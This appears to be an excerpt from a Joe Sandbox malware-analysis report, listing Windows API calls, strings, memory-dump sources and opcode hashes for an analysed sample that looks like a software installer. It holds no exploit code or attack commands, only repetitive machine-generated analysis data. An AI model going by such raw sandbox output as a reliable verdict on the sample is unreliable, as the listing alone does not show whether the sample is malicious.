                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveChangeNotifyWindow
                                                                              • String ID: $Need to restart Windows? %s
                                                                              • API String ID: 1160245247-4200181552
                                                                              • Opcode ID: 81628947227ec58f55b2c351f2131b28aedfbb6b6148b8ba4744526014514c8c
                                                                              • Instruction ID: 086790f0fc0b942e3ee9f07944933bacbb32a26cbddea002bc31c7aef2919c1b
                                                                              • Opcode Fuzzy Hash: 81628947227ec58f55b2c351f2131b28aedfbb6b6148b8ba4744526014514c8c
                                                                              • Instruction Fuzzy Hash: 60919F746002449FDB10FB69D9C5BAE7BE5AF59304F4484BBE8009B3A2C7B8AD05CB5D
                                                                              APIs
                                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                              • GetLastError.KERNEL32(00000000,0046FB4D,?,?,0049C1DC,00000000), ref: 0046FA2A
                                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FAA4
                                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FAC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                              • String ID: Creating directory: %s
                                                                              • API String ID: 2451617938-483064649
                                                                              • Opcode ID: d5447365283b068e30203d66d8a9de4eaa18c1a3b89182fdc70a83f7754103f0
                                                                              • Instruction ID: 553d0e02451aea180b77d3c3bea8b04784d1aec5cd58197de2500155b30451aa
                                                                              • Opcode Fuzzy Hash: d5447365283b068e30203d66d8a9de4eaa18c1a3b89182fdc70a83f7754103f0
                                                                              • Instruction Fuzzy Hash: E5516474E00248ABDB00DFA5D992BDEB7F5AF49304F50847AE850B7386D7786E08CB59
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressByteCharMultiProcWide
                                                                              • String ID: SfcIsFileProtected$sfc.dll
                                                                              • API String ID: 2508298434-591603554
                                                                              • Opcode ID: b2872c537cb6cd03ad7726ff2c2bd0a0e2fc6763cd0da9df413ff005d177c2bc
                                                                              • Instruction ID: 0183ab2a96bad10459dc7acb776d15a29b7b4c70eaa7773bbc3cb8db3249cf06
                                                                              • Opcode Fuzzy Hash: b2872c537cb6cd03ad7726ff2c2bd0a0e2fc6763cd0da9df413ff005d177c2bc
                                                                              • Instruction Fuzzy Hash: 1A419771A042189BEB20DB59DC85B9DB7B8EB4430DF5041B7E908A7293D7785F88CE1C
                                                                              APIs
                                                                              • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                              • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                              • RegisterClassA.USER32(?), ref: 004164CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Class$InfoRegisterUnregister
                                                                              • String ID: @
                                                                              • API String ID: 3749476976-2766056989
                                                                              • Opcode ID: df6e090dea74baa5ac925230d828a7230e5c2d53f0976f0f8597eebaced2b944
                                                                              • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                              • Opcode Fuzzy Hash: df6e090dea74baa5ac925230d828a7230e5c2d53f0976f0f8597eebaced2b944
                                                                              • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                              APIs
                                                                              • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                              • API String ID: 395431579-1506664499
                                                                              • Opcode ID: 9bc7ff361d258be52dd27e2f74bcf33eed5b2b299b3a40fb55461f8ad11e2a91
                                                                              • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                              • Opcode Fuzzy Hash: 9bc7ff361d258be52dd27e2f74bcf33eed5b2b299b3a40fb55461f8ad11e2a91
                                                                              • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
Strings
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
• PendingFileRenameOperations2, xrefs: 00455A4F
• PendingFileRenameOperations, xrefs: 00455A40
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-2115312317
APIs
• FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9D5,?,00000000,00000000,?,?,00480C2B,?,?,00000000), ref: 0047F882
• FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9D5,?,00000000,00000000,?,?,00480C2B,?,?), ref: 0047F88F
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9A8,?,?,?,?,00000000,0047F9D5,?,00000000,00000000,?,?,00480C2B), ref: 0047F984
• FindClose.KERNEL32(000000FF,0047F9AF,0047F9A8,?,?,?,?,00000000,0047F9D5,?,00000000,00000000,?,?,00480C2B,?), ref: 0047F9A2
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
APIs
• GetMenu.USER32(00000000), ref: 00421361
• SetMenu.USER32(00000000,00000000), ref: 0042137E
• SetMenu.USER32(00000000,00000000), ref: 004213B3
• SetMenu.USER32(00000000,00000000), ref: 004213CF
Similarity
• API ID: Menu
• String ID:
• API String ID: 3711407533-0
APIs
• SendMessageA.USER32(?,?,?,?), ref: 00416B84
• SetTextColor.GDI32(?,00000000), ref: 00416B9E
• SetBkColor.GDI32(?,00000000), ref: 00416BB8
• CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
Similarity
• API ID: Color$CallMessageProcSendTextWindow
• String ID:
• API String ID: 601730667-0
APIs
• WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
• GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
• CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
Similarity
• API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
• String ID:
• API String ID: 4071923889-0
APIs
• GetDC.USER32(00000000), ref: 0042311E
• EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
• ReleaseDC.USER32(00000000,00000000), ref: 00423144
Similarity
• API ID: CapsDeviceEnumFontsRelease
• String ID:
• API String ID: 2698912916-0
APIs
• RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
• RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
• LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
• RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID:
• API String ID: 730355536-0
APIs
  • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C192,00000000,0045C31D,?,00000000,00000002,00000002), ref: 00450933
• FlushFileBuffers.KERNEL32(?), ref: 0045C2E9
Strings
• EndOffset range exceeded, xrefs: 0045C21D
• NumRecs range exceeded, xrefs: 0045C1E6
Similarity
• API ID: File$BuffersFlush
• String ID: EndOffset range exceeded$NumRecs range exceeded
• API String ID: 3593489403-659731555
APIs
  • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498726), ref: 0040334B
  • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498726), ref: 00403356
  • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498730), ref: 00406322
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
  • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498730), ref: 00406366
  • Part of subcall function 004063C4: 6F541CD0.COMCTL32(00498735), ref: 004063C4
  • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
  • Part of subcall function 00419040: GetVersion.KERNEL32(0049874E), ref: 00419040
  • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498762), ref: 0044F77F
  • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
  • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498767), ref: 0044FC1F
  • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498776), ref: 00453210
  • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
  • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498776), ref: 0045322A
  • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
  • Part of subcall function 00456F00: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F24
  • Part of subcall function 00464468: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049878A), ref: 00464477
  • Part of subcall function 00464468: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 0046447D
  • Part of subcall function 0046CC64: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC79
  • Part of subcall function 00478740: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498794), ref: 00478746
  • Part of subcall function 00478740: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478753
  • Part of subcall function 00478740: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478763
  • Part of subcall function 00483A6C: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00483B5B
  • Part of subcall function 00495724: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049573D
• SetErrorMode.KERNEL32(00000001,00000000,004987DC), ref: 004987AE
  • Part of subcall function 004984D8: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004987B8,00000001,00000000,004987DC), ref: 004984E2
  • Part of subcall function 004984D8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004984E8
  • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• ShowWindow.USER32(?,00000005,00000000,004987DC), ref: 0049880F
  • Part of subcall function 004820AC: SetActiveWindow.USER32(?), ref: 0048215A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF541FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                              • String ID: Setup
                                                                              • API String ID: 291738113-3839654196
                                                                              • Opcode ID: 4026870168645be20c4e504289bca16f7fc9894158eff1610b8fe089479f565d
                                                                              • Instruction ID: 72ad643eee306aeb53380572695708c68149a0501138caf3355f256a6ce1e3ac
                                                                              • Opcode Fuzzy Hash: 4026870168645be20c4e504289bca16f7fc9894158eff1610b8fe089479f565d
                                                                              • Instruction Fuzzy Hash: 7931C5712046409ED705BBBBAC5392D3B94EF8A728BA2447FF80486593DE3C58508A7F
                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: .tmp
                                                                              • API String ID: 1375471231-2986845003
                                                                              • Opcode ID: 7172d9ffade96b62561a832a68f8cbe161be4b5cae50dfb87ffdb02f7c338e4f
                                                                              • Instruction ID: ea6adcadec8e2c01cafa1ba510acc1338588d6ec7b4e1cf88163bb5bfef62d35
                                                                              • Opcode Fuzzy Hash: 7172d9ffade96b62561a832a68f8cbe161be4b5cae50dfb87ffdb02f7c338e4f
                                                                              • Instruction Fuzzy Hash: A9213575A002089BDB01EFA1C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                              APIs
                                                                                • Part of subcall function 00483560: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483571
                                                                                • Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048357E
                                                                                • Part of subcall function 00483560: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358C
                                                                                • Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483594
                                                                                • Part of subcall function 00483560: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 004835A0
                                                                                • Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 004835C1
                                                                                • Part of subcall function 00483560: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004835D4
                                                                                • Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004835DA
                                                                                • Part of subcall function 0048388C: GetVersionExA.KERNEL32(?,00483A9E,00000000,00483B73,?,?,?,?,?,00498799), ref: 0048389A
                                                                                • Part of subcall function 0048388C: GetVersionExA.KERNEL32(0000009C,?,00483A9E,00000000,00483B73,?,?,?,?,?,00498799), ref: 004838EC
                                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00483B5B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                              • String ID: SHGetKnownFolderPath$shell32.dll
                                                                              • API String ID: 3869789854-2936008475
                                                                              • Opcode ID: 36bbd7205677a14235ded179242f98fe4396733ea939f399f849956901c26b03
                                                                              • Instruction ID: 33d3db6593e9873a674f830e342c1c65c6cab746408e9d399a43700aa418428b
                                                                              • Opcode Fuzzy Hash: 36bbd7205677a14235ded179242f98fe4396733ea939f399f849956901c26b03
                                                                              • Instruction Fuzzy Hash: 672100B06503516EC300BF7E59A661A3BA5EB5474C380893FF804EB3D2D77E68145BAE
                                                                              APIs
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C41C,00000000,0047C432), ref: 0047C12A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID: RegisteredOrganization$RegisteredOwner
                                                                              • API String ID: 3535843008-1113070880
                                                                              • Opcode ID: 0e90ec8331aa68b80fdbd6afaabfad8867ded4c3b6cad332e65b349247218e2d
                                                                              • Instruction ID: 6af266579ce0f4cae339b7a6725c06c490679c1ac7d4d5cc7f46b4f942b6f465
                                                                              • Opcode Fuzzy Hash: 0e90ec8331aa68b80fdbd6afaabfad8867ded4c3b6cad332e65b349247218e2d
                                                                              • Instruction Fuzzy Hash: 32F0B430704244AFDB04DAA8EDD2BAA776AD741304FA4803FE1048F382D679DE019BAC
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004752F7), ref: 004750E5
                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004752F7), ref: 004750FC
                                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15,00000000), ref: 0045349F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateErrorFileHandleLast
                                                                              • String ID: CreateFile
                                                                              • API String ID: 2528220319-823142352
                                                                              • Opcode ID: bbf61bf67fe349c097a8a02b07410db95704594b340b54041ead5b805cfa0960
                                                                              • Instruction ID: 6399d4087dc53d24fa9d3bc8bb06fd86b45c214eecae9240140a798b65cacfb0
                                                                              • Opcode Fuzzy Hash: bbf61bf67fe349c097a8a02b07410db95704594b340b54041ead5b805cfa0960
                                                                              • Instruction Fuzzy Hash: 18E06D302407447BEA10FA69CCC6F4A77989B04768F10C162FA48AF3E2C5B9EC408658
                                                                              APIs
                                                                                • Part of subcall function 00456E90: CoInitialize.OLE32(00000000), ref: 00456E96
                                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                              • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F24
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                              • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                              • API String ID: 2906209438-2320870614
                                                                              • Opcode ID: 3ee7a517847f468c0619dab237ccb69dbf9a8b231eaadc82d937c3bc473404de
                                                                              • Instruction ID: 06a1b1eafb8ede6a4ef061af05be88198505768e1dcfa776260a5a664dfb1d55
                                                                              • Opcode Fuzzy Hash: 3ee7a517847f468c0619dab237ccb69dbf9a8b231eaadc82d937c3bc473404de
                                                                              • Instruction Fuzzy Hash: BBC04CA1F5271156CA00BBFA655361F2805DB5031FBD2803FB948A7587CE7C9C095B6E
                                                                              APIs
                                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                              • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC79
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
